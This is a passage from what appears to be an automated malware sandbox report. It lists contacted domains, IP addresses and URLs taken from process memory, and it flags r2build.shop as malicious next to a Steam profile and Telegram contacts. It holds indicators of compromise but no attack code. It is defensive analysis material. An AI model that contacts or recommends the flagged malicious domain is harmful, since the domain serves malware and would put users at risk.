            		142.250.186.46
            		truefalse
              		high
              play.google.com
              		142.250.186.46
              		truefalse
                		high
                t.me
                		149.154.167.99
                		truefalse
                  		high
                  www.google.com
                  		142.250.185.100
                  		truefalse
                    		high
                    r2build.shop
                    		94.130.191.182
                    		truetrue
                      		unknown
                      apis.google.com
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://steamcommunity.com/profiles/76561199816275252false
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://duckduckgo.com/chrome_newtabBitLockerToGo.exe, 00000004.00000002.2393078218.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, cj58q9.4.drfalse
                            		high
                            https://mail.google.com/mail/?usp=installed_webappchrome.exe, 00000005.00000003.2089698880.00000560006A0000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://duckduckgo.com/ac/?q=BitLockerToGo.exe, 00000004.00000002.2393078218.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, cj58q9.4.drfalse
                                		high
                                https://google-ohttp-relay-join.fastly-edge.com/zrchrome.exe, 00000005.00000003.2128764414.00000560015A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2128660799.000005600159C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://google-ohttp-relay-join.fastly-edge.com/Yrchrome.exe, 00000005.00000003.2128764414.00000560015A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2128660799.000005600159C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://docs.google.com/document/Jchrome.exe, 00000005.00000003.2089698880.00000560006A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://anglebug.com/4633chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://anglebug.com/7382chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.BitLockerToGo.exe, 00000004.00000002.2396533056.0000000005395000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2393078218.0000000004EB8000.00000004.00000020.00020000.00000000.sdmp, 6fu3ek.4.drfalse
                                            		high
                                            https://issuetracker.google.com/284462263chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://publickeyservice.gcp.privacysandboxservices.comchrome.exe, 00000005.00000003.2124689219.000005600148C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://polymer.github.io/AUTHORS.txtchrome.exe, 00000005.00000003.2102658406.0000056001060000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103955275.00000560006A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2102749689.000005600107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2102716950.0000056000F44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2102571883.0000056000F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2105056283.0000056001100000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2102692760.00000560010B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2105153832.000005600120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2104881176.00000560003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2104269889.0000056000F7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2104178146.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103874525.0000056000CF4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://docs.google.com/chrome.exe, 00000005.00000003.2089497215.0000056000490000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://docs.google.com/document/:chrome.exe, 00000005.00000003.2089698880.00000560006A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://publickeyservice.pa.aws.privacysandboxservices.comchrome.exe, 00000005.00000003.2124689219.000005600148C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://anglebug.com/7714chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://google-ohttp-relay-join.fastly-edge.com/7ochrome.exe, 00000005.00000003.2128764414.00000560015A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2128660799.000005600159C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://google-ohttp-relay-join.fastly-edge.com/7pchrome.exe, 00000005.00000003.2128764414.00000560015A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2128660799.000005600159C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://photos.google.com?referrer=CHROME_NTPchrome.exe, 00000005.00000003.2104466531.0000056000C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2105056283.0000056001100000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2105153832.000005600120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2104881176.00000560003A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://drive.google.com/?lfhs=2chrome.exe, 00000005.00000003.2089698880.00000560006A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://anglebug.com/6248chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://ogs.google.com/widget/callout?eom=1chrome.exe, 00000005.00000003.2116360888.0000056001350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2116724428.0000056001414000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2120642678.00000560013BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://anglebug.com/6929chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://anglebug.com/5281chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.youtube.com/?feature=ytcachrome.exe, 00000005.00000003.2089698880.00000560006A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94BitLockerToGo.exe, 00000004.00000002.2396533056.0000000005395000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2393078218.0000000004EB8000.00000004.00000020.00020000.00000000.sdmp, 6fu3ek.4.drfalse
                                                                              		high
                                                                              https://issuetracker.google.com/255411748chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://r2build.shop/~BitLockerToGo.exe, 00000004.00000003.2034519534.0000000000771000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                		unknown
                                                                                https://anglebug.com/7246chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://anglebug.com/7369chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://anglebug.com/7489chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://chrome.google.com/webstorechrome.exe, 00000005.00000003.2089497215.0000056000490000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://drive-daily-2.corp.google.com/chrome.exe, 00000005.00000003.2089497215.0000056000490000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://polymer.github.io/PATENTS.txtchrome.exe, 00000005.00000003.2102658406.0000056001060000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103955275.00000560006A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2102749689.000005600107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2102716950.0000056000F44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2102571883.0000056000F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2105056283.0000056001100000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2102692760.00000560010B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2105153832.000005600120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2104881176.00000560003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2104269889.0000056000F7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2104178146.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103874525.0000056000CF4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=BitLockerToGo.exe, 00000004.00000002.2393078218.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, cj58q9.4.drfalse
                                                                                              		high
                                                                                              https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaBitLockerToGo.exe, 00000004.00000002.2396533056.0000000005395000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2393078218.0000000004EB8000.00000004.00000020.00020000.00000000.sdmp, 6fu3ek.4.drfalse
                                                                                                		high
                                                                                                https://issuetracker.google.com/161903006chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.ecosia.org/newtab/BitLockerToGo.exe, 00000004.00000002.2393078218.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, cj58q9.4.drfalse
                                                                                                    		high
                                                                                                    https://drive-daily-1.corp.google.com/chrome.exe, 00000005.00000003.2089497215.0000056000490000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://r2build.shop/vBitLockerToGo.exe, 00000004.00000003.2034519534.0000000000771000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: malware
                                                                                                      		unknown
                                                                                                      https://drive-daily-5.corp.google.com/chrome.exe, 00000005.00000003.2089497215.0000056000490000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://plus.google.comchromecache_65.7.drfalse
                                                                                                          		high
                                                                                                          http://anglebug.com/3078chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://anglebug.com/7553chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://anglebug.com/5375chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://anglebug.com/5371chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://anglebug.com/4722chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://anglebug.com/7556chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://drive-preprod.corp.google.com/chrome.exe, 00000005.00000003.2089497215.0000056000490000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://google-ohttp-relay-join.fastly-edge.com/:pchrome.exe, 00000005.00000003.2128764414.00000560015A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2128660799.000005600159C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesBitLockerToGo.exe, 00000004.00000002.2393078218.0000000004E03000.00000004.00000020.00020000.00000000.sdmp, u3opp8.4.drfalse
                                                                                                                            		high
                                                                                                                            https://r2build.shop/XBitLockerToGo.exe, 00000004.00000003.2007421867.0000000000774000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: malware
                                                                                                                            		unknown
                                                                                                                            https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 00000005.00000003.2124689219.000005600148C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://anglebug.com/6692chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://issuetracker.google.com/258207403chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://r2build.shop/:BitLockerToGo.exe, 00000004.00000003.2034519534.0000000000771000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                  		unknown
                                                                                                                                  http://anglebug.com/3502chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://anglebug.com/3623chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://anglebug.com/3625chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://anglebug.com/3624chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://docs.google.com/presentation/Jchrome.exe, 00000005.00000003.2089698880.00000560006A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://anglebug.com/5007chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://drive.google.com/drive/installwebapp?usp=chrome_defaultchrome.exe, 00000005.00000003.2089698880.00000560006A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://anglebug.com/3862chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://r2build.shop/1BitLockerToGo.exe, 00000004.00000003.2020623455.0000000000772000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2034519534.0000000000771000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2007421867.0000000000774000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                  		unknown
                                                                                                                                                  https://chrome.google.com/webstoreLDDiscoverchrome.exe, 00000005.00000003.2101558755.0000056000D0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2104603310.0000056000CF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2101593773.0000056000D38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2105331240.0000056000D0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2099575636.000005600033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098916658.0000056000D38000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://r2build.shop/geBitLockerToGo.exe, 00000004.00000003.2078155669.0000000000772000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                    		unknown
                                                                                                                                                    http://anglebug.com/4836chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://issuetracker.google.com/issues/166475273chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29chrome.exe, 00000005.00000003.2124689219.000005600148C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://docs.google.com/presentation/:chrome.exe, 00000005.00000003.2089698880.00000560006A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://google-ohttp-relay-join.fastly-edge.com/frchrome.exe, 00000005.00000003.2128764414.00000560015A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2128660799.000005600159C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://google-ohttp-relay-join.fastly-edge.com/Erchrome.exe, 00000005.00000003.2128764414.00000560015A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2128660799.000005600159C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://anglebug.com/4384chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://mail.google.com/mail/?tab=rm&amp;ogblchrome.exe, 00000005.00000003.2116647879.000005600140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2121821114.0000056001448000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2116827607.000005600141C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2116527470.0000056001350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2121558192.0000056001350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2121654993.000005600136C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2116360888.0000056001350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2116724428.0000056001414000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://r2build.shop/(BitLockerToGo.exe, 00000004.00000003.2034519534.0000000000771000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                    		unknown
                                                                                                                                                                    http://anglebug.com/3970chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://r2build.shopBitLockerToGo.exe, 00000004.00000003.2007421867.0000000000774000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://apis.google.comchrome.exe, 00000005.00000003.2116360888.0000056001350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2116724428.0000056001414000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2120642678.00000560013BC000.00000004.00000800.00020000.00000000.sdmp, chromecache_65.7.dr, chromecache_62.7.drfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://support.mozilla.org/products/firefoxgro.allBitLockerToGo.exe, 00000004.00000002.2397117721.0000000005610000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://polymer.github.io/CONTRIBUTORS.txtchrome.exe, 00000005.00000003.2102658406.0000056001060000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103955275.00000560006A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2102749689.000005600107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2102716950.0000056000F44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2102571883.0000056000F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2105056283.0000056001100000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2102692760.00000560010B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2105153832.000005600120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2104881176.00000560003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2104269889.0000056000F7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2104178146.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103874525.0000056000CF4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://labs.google.com/search?source=ntpchrome.exe, 00000005.00000003.2116647879.000005600140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2121821114.0000056001448000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2116827607.000005600141C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2116527470.0000056001350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2121558192.0000056001350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2121654993.000005600136C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2116360888.0000056001350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2116724428.0000056001414000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://domains.google.com/suggest/flowchromecache_65.7.drfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://google-ohttp-relay-query.fastly-edge.com/2Pchrome.exe, 00000005.00000003.2086218815.0000102000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2126796561.000010200080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2124689219.000005600148C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://google-ohttp-relay-join.fastly-edge.com/#pchrome.exe, 00000005.00000003.2128764414.00000560015A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2128660799.000005600159C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://anglebug.com/7604chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://google-ohttp-relay-join.fastly-edge.com/hjchrome.exe, 00000005.00000003.2086639982.0000102000684000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://anglebug.com/7761chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://ogs.google.com/widget/app/so?eom=1chrome.exe, 00000005.00000003.2116360888.0000056001350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2116724428.0000056001414000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2120642678.00000560013BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://anglebug.com/7760chrome.exe, 00000005.00000003.2098185243.0000056000A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2095118333.0000056000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098154524.0000056000380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
